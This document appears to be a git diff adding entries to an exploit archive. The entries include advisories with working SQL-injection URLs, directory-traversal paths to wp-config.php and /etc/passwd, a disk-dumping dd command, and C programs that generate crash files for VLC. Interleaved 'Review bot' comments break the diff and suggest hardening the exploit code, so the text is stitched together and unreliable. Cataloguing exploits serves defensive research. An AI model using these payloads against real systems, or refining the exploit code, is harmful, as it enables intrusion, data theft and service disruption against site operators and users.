diff --git a/files.csv b/files.csv
index 88d373f7f..604adf355 100755
--- a/files.csv
+++ b/files.csv
@@ -35196,3 +35196,26 @@ id,file,description,date,author,platform,type,port
 38932,platforms/multiple/dos/38932.txt,"Avast JetDb::IsExploited4x - Performs Unbounded Search on Input",2015-12-10,"Google Security Research",multiple,dos,0
 38933,platforms/multiple/dos/38933.txt,"Avast Heap Overflow Unpacking MoleBox Archives",2015-12-10,"Google Security Research",multiple,dos,0
 38934,platforms/windows/dos/38934.txt,"Avast Integer Overflow Verifying numFonts in TTC Header",2015-12-10,"Google Security Research",windows,dos,0
+38935,platforms/asp/webapps/38935.txt,"CMS Afroditi 'id' Parameter SQL Injection Vulnerablity",2013-12-30,"projectzero labs",asp,webapps,0
+38936,platforms/php/webapps/38936.txt,"Advanced Dewplayer Plugin for WordPress 'download-file.php' Script Directory Traversal Vulnerability",2013-12-30,"Henri Salo",php,webapps,0
+38937,platforms/linux/local/38937.txt,"Apache Libcloud Digital Ocean API Local Information Disclosure Vulnerability",2014-01-01,anonymous,linux,local,0
+38938,platforms/php/webapps/38938.txt,"xBoard 'post' Parameter Local File Include Vulnerability",2013-12-24,"TUNISIAN CYBER",php,webapps,0
+38939,platforms/multiple/dos/38939.c,"VLC Media Player 1.1.11 '.NSV' File Denial of Service Vulnerability",2012-03-14,"Dan Fosco",multiple,dos,0
+38940,platforms/multiple/dos/38940.c,"VLC Media Player 1.1.11 '.EAC3' File Denial of Service Vulnerability",2012-03-14,"Dan Fosco",multiple,dos,0
+38942,platforms/php/webapps/38942.txt,"SPAMINA Cloud Email Firewall Directory Traversal Vulnerability",2013-10-03,"Sisco Barrera",php,webapps,0
+38943,platforms/php/webapps/38943.txt,"Joomla! Aclsfgpl Component 'index.php' Arbitrary File Upload Vulnerability",2014-01-07,"TUNISIAN CYBER",php,webapps,0
+38944,platforms/php/webapps/38944.txt,"Command School Student Management System /sw/admin_grades.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38945,platforms/php/webapps/38945.txt,"Command School Student Management System /sw/admin_terms.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38946,platforms/php/webapps/38946.txt,"Command School Student Management System /sw/admin_school_years.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38947,platforms/php/webapps/38947.txt,"Command School Student Management System /sw/admin_sgrades.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38948,platforms/php/webapps/38948.txt,"Command School Student Management System /sw/admin_media_codes_1.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38949,platforms/php/webapps/38949.txt,"Command School Student Management System /sw/admin_infraction_codes.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38950,platforms/php/webapps/38950.txt,"Command School Student Management System /sw/admin_generations.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38951,platforms/php/webapps/38951.txt,"Command School Student Management System /sw/admin_relations.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38952,platforms/php/webapps/38952.txt,"Command School Student Management System /sw/admin_titles.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38953,platforms/php/webapps/38953.txt,"Command School Student Management System /sw/health_allergies.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38954,platforms/php/webapps/38954.txt,"Command School Student Management System /sw/admin_school_names.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38955,platforms/php/webapps/38955.txt,"Command School Student Management System /sw/admin_subjects.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38956,platforms/php/webapps/38956.txt,"Command School Student Management System /sw/backup/backup_ray2.php Database Backup Direct Request Information Disclosure",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38957,platforms/php/webapps/38957.html,"Command School Student Management System /sw/admin_change_password.php Admin Password Manipulation CSRF",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38958,platforms/php/webapps/38958.html,"Command School Student Management System /sw/add_topic.php Topic Creation CSRF",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
diff --git a/platforms/asp/webapps/38935.txt b/platforms/asp/webapps/38935.txt
new file mode 100755
index 000000000..d92504441
--- /dev/null
+++ b/platforms/asp/webapps/38935.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/64572/info
+
+CMS Afroditi is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+CMS Afroditi 1.0 is vulnerable.
+
+http://www.example.com/default.asp?id=25 and 0<=(SELECT count(*) FROM [site]) and 1=1
\ No newline at end of file
diff --git a/platforms/linux/local/38937.txt b/platforms/linux/local/38937.txt
new file mode 100755
index 000000000..90936f180
--- /dev/null
+++ b/platforms/linux/local/38937.txt
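Review bot: The author field of the new rows 38944 through 38958 is quoted with a trailing space, `"AtT4CKxT3rR0r1ST "`, so these entries will group and sort as a different author from the same handle written without the space; trimming the field before commit, `...,2014-01-07,"AtT4CKxT3rR0r1ST",php,webapps,0`, keeps the index consistent. Row 38935's description also misspells the last word as `Vulnerablity`, which a title search for "Vulnerability" will not match. The hunk header's count (3 context + 23 added = 26) does agree with the rows shown, so only the field contents need attention.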
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/64617/info
+
+Apache Libcloud is prone to a local information-disclosure vulnerability.
+
+Local attackers can exploit this issue to obtain sensitive information. Information obtained may lead to further attacks.
+
+Apache Libcloud versions 0.12.3 through 0.13.2 are vulnerable.
+
+dd if=/dev/vda bs=1M | strings -n 100 > out.txt
\ No newline at end of file
diff --git a/platforms/multiple/dos/38939.c b/platforms/multiple/dos/38939.c
new file mode 100755
index 000000000..aa096c25c
--- /dev/null
+++ b/platforms/multiple/dos/38939.c
@@ -0,0 +1,38 @@
+source: http://www.securityfocus.com/bid/64623/info
+
+VLC Media Player is prone to a denial-of-service vulnerability.
+
+Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.
+
+VLC Media Player 1.1.11 is vulnerable; other versions may also be affected.
+
+# Exploit Title: VLC v. 1.1.11 .nsv DOS
+# Date: 3/14/2012
+# Author: Dan Fosco
+# Vendor or Software Link: www.videolan.org
+# Version: 1.1.11
+# Category: local
+# Google dork: n/a
+# Tested on: Windows XP SP3 (64-bit)
+# Demo site: n/a
+
+#include
+
+int main()
+{
+ FILE *f;
+ f = fopen("dos.nsv", "w");
+ fputs("\x4e\x53\x56\x66", f);
+ fputc('\x00', f);
+ fputc('\x00', f);
+ fputc('\x00', f);
+ fputc('\x00', f);
+ fclose(f);
+ return 0;
+}
+
+//use code for creating malicious file
+
+edit: works on 2.0.1.0
+
+
diff --git a/platforms/multiple/dos/38940.c b/platforms/multiple/dos/38940.c
new file mode 100755
index 000000000..0a424d905
--- /dev/null
+++ b/platforms/multiple/dos/38940.c
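Review bot: The result of `fopen("dos.nsv", "w")` in `main` is passed to `fputs`/`fputc`/`fclose` without a NULL check, so the program dereferences a null `FILE *` whenever the working directory is not writable; add `if (!f) { perror("fopen"); return 1; }` directly after the call. The `#include` directive carries no header name in this rendering — most likely `<stdio.h>` was eaten as markup on the way into the archive, so confirm the stored file still reads `#include <stdio.h>`. Because the advisory prose and the `#`-prefixed header block above the code are not inside a comment, the file as stored is not a compilable translation unit; `int main()` should also be the C99 form `int main(void)`.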
@@ -0,0 +1,33 @@
+source: http://www.securityfocus.com/bid/64626/info
+
+VLC Media Player is prone to a denial-of-service vulnerability.
+
+Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.
+
+VLC Media Player 1.1.11 is vulnerable; other versions may also be affected.
+
+# Exploit Title: VLC v. 1.1.11 .eac3 DOS
+# Date: 3/14/2012
+# Author: Dan Fosco
+# Vendor or Software Link: www.videolan.org
+# Version: 1.1.11
+# Category:: local
+# Google dork: n/a
+# Tested on: Windows XP SP3 (64-bit)
+# Demo site: n/a
+
+#include
+
+int main(int argc, char *argv[])
+{
+ FILE *f;
+ f = fopen(argv[1], "r+");
+ fseek(f, 5, SEEK_SET);
+ fputc('\x00', f);
+ fclose(f);
+ return 0;
+}
+
+//code updates eac3 file, can find samples on videolan ftp server
+
+
diff --git a/platforms/php/webapps/38936.txt b/platforms/php/webapps/38936.txt
new file mode 100755
index 000000000..9ac8c32b4
--- /dev/null
+++ b/platforms/php/webapps/38936.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/64587/info
+
+The Advanced Dewplayer plugin for WordPress is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.
+
+Advanced Dewplayer 1.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php
\ No newline at end of file
diff --git a/platforms/php/webapps/38938.txt b/platforms/php/webapps/38938.txt
new file mode 100755
index 000000000..e43f7cb01
--- /dev/null
+++ b/platforms/php/webapps/38938.txt
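Review bot: `fopen(argv[1], "r+")` in `main` is reached without checking `argc`, and its return value goes straight into `fseek`, so invoking the program with no argument or with a path that cannot be opened dereferences NULL; guard with `if (argc < 2) return 1;` before the call and `if (!f) { perror("fopen"); return 1; }` after it. The `fseek` and `fputc` results are likewise unchecked, so a short or read-only file fails silently and `return 0` reports success. As in 38939.c, the `#include` line shows no header name here (presumably `<stdio.h>`, lost as markup) and the uncommented advisory text above `int main` means the file is not compilable as stored; the `# Category:: local` header also has a doubled colon.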
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/64619/info
+
+xBoard is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts. This could allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+xBoard 5.0, 5.5, and 6.0 are vulnerable.
+
+http://www.example.com/xboard/view.php?post=[LFI]
\ No newline at end of file
diff --git a/platforms/php/webapps/38942.txt b/platforms/php/webapps/38942.txt
new file mode 100755
index 000000000..99ab519da
--- /dev/null
+++ b/platforms/php/webapps/38942.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/64693/info
+
+SPAMINA Cloud Email Firewall is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
+
+A remote attacker could exploit the vulnerability using directory-traversal characters ('../') to access arbitrary files that contain sensitive information. Information harvested may aid in launching further attacks.
+
+SPAMINA Cloud Email Firewall 3.3.1.1 is vulnerable; other versions may also be affected.
+
+https://www.example.com/?action=showHome&language=../../../../../../../../../../etc/passwd%00.jpg
+https://www.example.com/multiadmin/js/lib/?action=../../../../../../../../../../etc/passwd&language=de
+https://www.example.com/index.php?action=userLogin&language=../../../../../../../../../../etc/passwd.jpg
\ No newline at end of file
diff --git a/platforms/php/webapps/38943.txt b/platforms/php/webapps/38943.txt
new file mode 100755
index 000000000..3bba12872
--- /dev/null
+++ b/platforms/php/webapps/38943.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/64705/info
+
+The Aclsfgpl component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
+
+http://www.example.com/index.php?option=com_aclsfgpl&Itemid=[num]&ct=servs1&md=add_form
\ No newline at end of file
diff --git a/platforms/php/webapps/38944.txt b/platforms/php/webapps/38944.txt
new file mode 100755
index 000000000..2914f5af0
--- /dev/null
+++ b/platforms/php/webapps/38944.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/64707/info
+
+Command School Student Management System is prone to the following security vulnerabilities:
+
+1. Multiple SQL-injection vulnerabilities
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An HTML injection vulnerability
+5. A security-bypass vulnerability
+
+Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
+
+Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
+
+http://www.example.com/sw/admin_grades.php?action=edit&id=null+and+1=2+union+select+version()
\ No newline at end of file
diff --git a/platforms/php/webapps/38945.txt b/platforms/php/webapps/38945.txt
new file mode 100755
index 000000000..18e819303
--- /dev/null
+++ b/platforms/php/webapps/38945.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/64707/info
+
+Command School Student Management System is prone to the following security vulnerabilities:
+
+1. Multiple SQL-injection vulnerabilities
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An HTML injection vulnerability
+5. A security-bypass vulnerability
+
+Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
+
+Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
+
+http://www.example.com/sw/admin_terms.php?action=edit&id=null+and+1=2+union+select+version()
\ No newline at end of file
diff --git a/platforms/php/webapps/38946.txt b/platforms/php/webapps/38946.txt
new file mode 100755
index 000000000..e428a5c42
--- /dev/null
+++ b/platforms/php/webapps/38946.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/64707/info
+
+Command School Student Management System is prone to the following security vulnerabilities:
+
+1. Multiple SQL-injection vulnerabilities
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An HTML injection vulnerability
+5. A security-bypass vulnerability
+
+Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
+
+Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
+
+http://www.example.com/sw/admin_school_years.php?action=edit&id=null+and+1=2+union+select+version()
\ No newline at end of file
diff --git a/platforms/php/webapps/38947.txt b/platforms/php/webapps/38947.txt
new file mode 100755
index 000000000..ac9f1b04b
--- /dev/null
+++ b/platforms/php/webapps/38947.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/64707/info
+
+Command School Student Management System is prone to the following security vulnerabilities:
+
+1. Multiple SQL-injection vulnerabilities
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An HTML injection vulnerability
+5. A security-bypass vulnerability
+
+Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
+
+Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
+
+http://www.example.com/sw/admin_sgrades.php?action=edit&id=null+and+1=2+union+select+version()
\ No newline at end of file
diff --git a/platforms/php/webapps/38948.txt b/platforms/php/webapps/38948.txt
new file mode 100755
index 000000000..ea300d942
--- /dev/null
+++ b/platforms/php/webapps/38948.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/64707/info
+
+Command School Student Management System is prone to the following security vulnerabilities:
+
+1. Multiple SQL-injection vulnerabilities
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An HTML injection vulnerability
+5. A security-bypass vulnerability
+
+Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
+
+Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
+
+http://www.example.com/sw/admin_media_codes_1.php?action=edit&id=null+and+1=2+union+select+version(),2,3
\ No newline at end of file
diff --git a/platforms/php/webapps/38949.txt b/platforms/php/webapps/38949.txt
new file mode 100755
index 000000000..f44044a3a
--- /dev/null
+++ b/platforms/php/webapps/38949.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/64707/info
+
+Command School Student Management System is prone to the following security vulnerabilities:
+
+1. Multiple SQL-injection vulnerabilities
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An HTML injection vulnerability
+5. A security-bypass vulnerability
+
+Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
+
+Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
+
+http://www.example.com/sw/admin_infraction_codes.php?action=edit&id=null+and+1=2+union+select+version()
\ No newline at end of file
diff --git a/platforms/php/webapps/38950.txt b/platforms/php/webapps/38950.txt
new file mode 100755
index 000000000..c4cc7ab48
--- /dev/null
+++ b/platforms/php/webapps/38950.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/64707/info
+
+Command School Student Management System is prone to the following security vulnerabilities:
+
+1. Multiple SQL-injection vulnerabilities
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An HTML injection vulnerability
+5. A security-bypass vulnerability
+
+Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
+
+Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
+
+http://www.example.com/sw/admin_generations.php?action=edit&id=null+and+1=2+union+select+version()
\ No newline at end of file
diff --git a/platforms/php/webapps/38951.txt b/platforms/php/webapps/38951.txt
new file mode 100755
index 000000000..13fec906f
--- /dev/null
+++ b/platforms/php/webapps/38951.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/64707/info
+
+Command School Student Management System is prone to the following security vulnerabilities:
+
+1. Multiple SQL-injection vulnerabilities
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An HTML injection vulnerability
+5. A security-bypass vulnerability
+
+Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
+
+Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
+
+http://www.example.com/sw/admin_relations.php?action=edit&id=null+and+1=2+union+select+version()
\ No newline at end of file
diff --git a/platforms/php/webapps/38952.txt b/platforms/php/webapps/38952.txt
new file mode 100755
index 000000000..f5d4ba450
--- /dev/null
+++ b/platforms/php/webapps/38952.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/64707/info
+
+Command School Student Management System is prone to the following security vulnerabilities:
+
+1. Multiple SQL-injection vulnerabilities
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An HTML injection vulnerability
+5. A security-bypass vulnerability
+
+Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
+
+Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
+
+http://www.example.com/sw/admin_titles.php?action=edit&id=null+and+1=2+union+select+version()
\ No newline at end of file
diff --git a/platforms/php/webapps/38953.txt b/platforms/php/webapps/38953.txt
new file mode 100755
index 000000000..cee1706d9
--- /dev/null
+++ b/platforms/php/webapps/38953.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/64707/info
+
+Command School Student Management System is prone to the following security vulnerabilities:
+
+1. Multiple SQL-injection vulnerabilities
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An HTML injection vulnerability
+5. A security-bypass vulnerability
+
+Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
+
+Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
+
+http://www.example.com/sw/health_allergies.php?action=edit&id=null+and+1=2+union+select+version()
\ No newline at end of file
diff --git a/platforms/php/webapps/38954.txt b/platforms/php/webapps/38954.txt
new file mode 100755
index 000000000..5ad8b02fe
--- /dev/null
+++ b/platforms/php/webapps/38954.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/64707/info
+
+Command School Student Management System is prone to the following security vulnerabilities:
+
+1. Multiple SQL-injection vulnerabilities
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An HTML injection vulnerability
+5. A security-bypass vulnerability
+
+Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
+
+Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
+
+http://www.example.com/sw/admin_school_names.php?action=edit&id=null+and+1=2+union+select+version()
\ No newline at end of file
diff --git a/platforms/php/webapps/38955.txt b/platforms/php/webapps/38955.txt
new file mode 100755
index 000000000..9221e220e
--- /dev/null
+++ b/platforms/php/webapps/38955.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/64707/info
+
+Command School Student Management System is prone to the following security vulnerabilities:
+
+1. Multiple SQL-injection vulnerabilities
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An HTML injection vulnerability
+5. A security-bypass vulnerability
+
+Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
+
+Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
+
+http://www.example.com/sw/admin_subjects.php?action=edit&id=null+and+1=2+union+select+version()
\ No newline at end of file
diff --git a/platforms/php/webapps/38956.txt b/platforms/php/webapps/38956.txt
new file mode 100755
index 000000000..281c07123
--- /dev/null
+++ b/platforms/php/webapps/38956.txt
@@ -0,0 +1,82 @@
+source: http://www.securityfocus.com/bid/64707/info
+
+Command School Student Management System is prone to the following security vulnerabilities:
+
+1. Multiple SQL-injection vulnerabilities
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An HTML injection vulnerability
+5. A security-bypass vulnerability
+
+Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
+
+Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
+
+
+##############
+VULNERABILITY
+##############
+
+/Backup/backup_ray2.php (LINE: 78-126)
+
+-----------------------------------------------------------------------------
+// SET THE NAME OF THE BACKUP WITH A TIMESTAMP
+$bkup = 'mysql' . date('Ymd\THis') . $db_name . '.txt';
+$fp = fopen($bkup, "w");
+
+
+// GET THE LIST OF TABLES
+$sql = "SHOW TABLES";
+$res = mysql_query($sql);
+if (!$res) die( mysql_error() );
+if (mysql_num_rows($res) == 0) die( "NO TABLES IN $db_name" );
+while ($s = mysql_fetch_array($res))
+{
+ $tables[] = $s[0];
+}
+
+
+// ITERATE OVER THE LIST OF TABLES
+foreach ($tables as $table)
+{
+
+// WRITE THE DROP TABLE STATEMENT
+ fwrite($fp,"DROP TABLE `$table`;\n");
+
+// GET THE CREATE TABLE STATEMENT
+ $res = mysql_query("SHOW CREATE TABLE `$table`");
+ if (!$res) die( mysql_error() );
+ $cre = mysql_fetch_array($res);
+ $cre[1] .= ";";
+ $txt = str_replace("\n", "", $cre[1]); // FIT EACH QUERY ON ONE LINE
+ fwrite($fp, $txt . "\n");
+
+// GET THE TABLE DATA
+ $data = mysql_query("SELECT * FROM `$table`");
+ $num = mysql_num_fields($data);
+ while ($row = mysql_fetch_array($data))
+ {
+
+// MAKE INSERT STATEMENTS FOR ALL THE VALUES
+ $txt = "INSERT INTO `$table` VALUES(";
+ for ($i=0; $i < $num; $i++)
+ {
+ $txt .= "'".mysql_real_escape_string($row[$i])."', ";
+ }
+ $txt = substr($txt, 0, -2);
+ fwrite($fp, $txt . ");\n");
+ }
+}
+// ALL DONE
+fclose($fp);
+-----------------------------------------------------------------------------
+
+#####################################################
+EXPLOIT
+#####################################################
+
+
+Iphobos Blog
+
+
diff --git a/platforms/php/webapps/38957.html b/platforms/php/webapps/38957.html
new file mode 100755
index 000000000..07fb71626
--- /dev/null
+++ b/platforms/php/webapps/38957.html
@@ -0,0 +1,25 @@
+source: http://www.securityfocus.com/bid/64707/info
+
+Command School Student Management System is prone to the following security vulnerabilities:
+
+1. Multiple SQL-injection vulnerabilities
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An HTML injection vulnerability
+5. A security-bypass vulnerability
+
+Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
+
+Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
+
+[Change Password Admin]
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/platforms/php/webapps/38958.html b/platforms/php/webapps/38958.html
new file mode 100755
index 000000000..562408329
--- /dev/null
+++ b/platforms/php/webapps/38958.html
@@ -0,0 +1,26 @@
+source: http://www.securityfocus.com/bid/64707/info
+
+Command School Student Management System is prone to the following security vulnerabilities:
+
+1. Multiple SQL-injection vulnerabilities
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An HTML injection vulnerability
+5. A security-bypass vulnerability
+
+Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
+
+Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
+
+[CSRF with XSS Exploit]
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file